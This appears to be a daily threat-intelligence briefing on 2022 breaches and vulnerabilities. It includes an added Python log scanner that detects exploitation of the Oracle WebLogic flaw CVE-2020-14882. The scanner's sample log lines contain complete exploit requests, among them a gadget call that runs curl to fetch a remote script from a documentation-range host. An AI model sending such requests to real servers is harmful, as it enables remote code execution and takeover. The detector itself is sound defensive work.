Cyware Daily Threat Intelligence

Daily Threat Briefing • Sep 16, 2022
The value of cryptocurrencies has plummeted in the last few months, but they remain a hot target for hacking groups. Kinsing malware operators were observed exploiting security flaws in Oracle WebLogic Server to deliver a cryptominer; the group has a history of scanning for vulnerable servers and enrolling them in its botnet. In other news, Mandiant analysts assess that North Korean state-backed actors distributed a trojanized version of the PuTTY SSH client to backdoor the networks of organizations they want to spy on, in this case media companies.
Furthermore, Google has released a Chrome 105 update addressing 11 issues, seven of them rated high severity. The update rolled out to Mac and Linux users as Chrome 105.0.5195.125.
Starbucks customer data compromised
Starbucks Singapore confirmed that hackers illegally accessed some of its customers' personal data, including names, residential addresses, mobile numbers, and birthdates. The company said customers' credit card details and passwords were not compromised, though the F&B chain has nonetheless advised all customers to change their passwords immediately.
Uber systems breached
Uber disclosed a security incident in which attackers compromised its internal networks and gained access to confidential information, including vulnerability reports. The attackers reportedly used social engineering against an employee to obtain initial access, then reached internal systems including Slack and harvested further credentials. They obtained vulnerability disclosure data by accessing the company's HackerOne bug bounty program.
Hive outfit hacks BTS
The Hive ransomware group claimed responsibility for an attack on Bell Canada subsidiary Bell Technical Solutions (BTS), saying it had gained access to the firm's operational and employee data. The affected information included names, addresses, and phone numbers of residential and small business customers in Ontario and Quebec. No critical client information, such as credit or debit card numbers, banking details, or other financial information, was reported leaked.
Kinsing drops cryptominers on Oracle servers
Kinsing malware operators were found abusing both recently published and older security vulnerabilities in Oracle WebLogic Server to deliver cryptominers. They exploited CVE-2020-14882, an unauthenticated remote code execution flaw in the WebLogic administration console, to drop Python scripts that disable OS security features. The attackers exploit the flaw on unpatched servers to take control of them and deploy malicious payloads.
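The check a WebLogic operator most wants after reading this is whether the console has already been probed for CVE-2020-14882. The script below is an added example, not code from the Cyware briefing or from the research it summarizes. It scans web-server access logs for the publicly documented exploitation pattern for this bug: a URL-encoded (often double-encoded) `../` traversal from an unauthenticated console path such as `/console/css/` back into `console.portal`, optionally combined with a `handle=` parameter naming one of the gadget classes public exploits use to turn the bypass into code execution. The combined-format log lines, IP addresses (RFC 5737 documentation ranges), and request contents are constructed for the example; the traversal and gadget-class indicators come from public exploit write-ups, not from this page. It goes slightly beyond the text in that it also catches single-encoded and mixed-case variants of the traversal.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache/NGINX combined log format, written for this
# example; they are not telemetry from the Kinsing campaign.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Sep/2022:10:01:02 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [16/Sep/2022:10:01:09 +0000] "GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27curl%20http://198.51.100.9/k.sh%27)%22) HTTP/1.1" 302 0 "-" "python-requests/2.28"
203.0.113.8 - - [16/Sep/2022:10:02:31 +0000] "GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22http://198.51.100.9/x.xml%22) HTTP/1.1" 302 0 "-" "curl/7.84"
203.0.113.9 - - [16/Sep/2022:10:03:00 +0000] "GET /console/console.portal?_nfpb=true&_pageLabel=HomePage1 HTTP/1.1" 200 41231 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# After decoding, the auth-bypass request reads /console/<static path>/../console.portal:
# a traversal from a path the login filter does not protect back into the console servlet.
TRAVERSAL_RE = re.compile(r"/console/[^?]*\.\./[^?]*console\.portal", re.IGNORECASE)

# Gadget classes that public CVE-2020-14882/14883 exploits pass in the handle= parameter.
GADGET_CLASSES = (
    "com.tangosol.coherence.mvel2.sh.ShellSession",
    "com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext",
)


def fully_decode(value, max_rounds=4):
    """Percent-decode until stable: exploits double-encode '../' as %252e%252e%252f."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(line):
    """Return the list of reasons a request looks like CVE-2020-14882 exploitation ([] if none)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    raw = m.group("target")
    target = fully_decode(raw)
    reasons = []
    if TRAVERSAL_RE.search(target):
        reasons.append("console path traversal")
        if "%25" in raw:  # a literal '%' was itself encoded: double encoding
            reasons.append("double URL encoding")
    for cls in GADGET_CLASSES:
        if cls in target:
            reasons.append("gadget " + cls.rsplit(".", 1)[-1])
    return reasons


def scan(log_text):
    """Scan a whole log and return one record per suspicious request."""
    hits = []
    for line in log_text.splitlines():
        reasons = classify(line)
        if reasons:
            m = LOG_RE.match(line)
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"), "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], "; ".join(hit["reasons"]))
```

A hit on the traversal alone means the server was probed; a hit that also carries a gadget class means an exploitation attempt that succeeded if the host was unpatched, so the next step is checking that host for unexpected processes, cron entries, and outbound connections. Detection is no substitute for applying the October 2020 Critical Patch Update that fixed CVE-2020-14882 and for keeping the administration console off the internet.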
Hackers deploy backdoor on media firms
Mandiant discovered North Korean hackers using trojanized versions of the PuTTY and KiTTY SSH clients to deploy a new backdoor, AIRDRY.V2, on media companies. The Operation Dream Job campaign, active since 2020, now lures targets with a fake Amazon job assessment. Mandiant attributes the activity to the threat cluster UNC4034, aka Temp.Hermit or Labyrinth Chollima.
Security holes in WAPPLES firewall
Kazakhstan-based security researcher Konstantin Burov uncovered multiple bugs in the WAPPLES web application firewall. In versions 4.0 through 6.0, the bugs allow a remote attacker to execute arbitrary code and access sensitive information via predefined credentials; versions 5.0 and 6.0 are additionally exposed to privilege escalation flaws. The vulnerabilities are tracked as CVE-2022-24706, CVE-2022-35413, CVE-2022-31322, CVE-2022-31324, and CVE-2022-35582.
Maintainers fix open source CMS flaw
Security researcher David Klein reported a cross-site scripting (XSS) flaw in the open-source CMS TYPO3. The project issued fixed releases of typo3/cms-core: versions 7.6.58, 8.7.48, 9.5.37, 10.4.32, and 11.5.16. All earlier versions on each of these release lines are affected.
Chrome fixes high-severity vulnerabilities
Google released a Chrome 105 update that patches 11 vulnerabilities, including seven high-severity bugs, with CVE identifiers CVE-2022-3195 through CVE-2022-3201. One of the issues lies in Chrome's Storage component. Three use-after-free flaws affect the PDF component and a fourth use-after-free affects Frames. The remaining two vulnerabilities are in Internals and in DevTools.